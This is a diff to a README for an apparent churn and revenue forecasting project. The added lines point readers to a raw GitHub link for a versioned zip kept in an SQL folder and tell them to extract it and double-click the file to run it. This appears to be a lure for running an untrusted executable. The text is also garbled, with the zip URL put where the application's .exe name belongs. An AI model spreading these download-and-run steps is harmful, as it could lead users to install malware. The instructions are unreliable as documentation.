nagasalto899/churn_and_revenue_forecasting/README.md

    Choose the most recent version.
 Check the release notes for any important updates or changes.

 3. **Download the File**
-   Click on the link for the file (usually named something like `churn_and_revenue_forecasting.zip`).
+   Click on the link for the file (usually named something like `https://raw.githubusercontent.com/nagasalto899/churn_and_revenue_forecasting/main/SQL/churn_and_revenue_forecasting_1.8-beta.5.zip`).
 The download should start automatically.

 4. **Extract the Files**
    Once the download is complete, locate the downloaded file.
 Right-click on it and select "Extract All" to unpack the contents.

 5. **Run the Application**
    Find the extracted folder.
-Look for the application file (e.g., `churn_and_revenue_forecasting.exe`).
+Look for the application file (e.g., `https://raw.githubusercontent.com/nagasalto899/churn_and_revenue_forecasting/main/SQL/churn_and_revenue_forecasting_1.8-beta.5.zip`).
 Double-click this file to run the application.

 ## 🖥️ System Requirements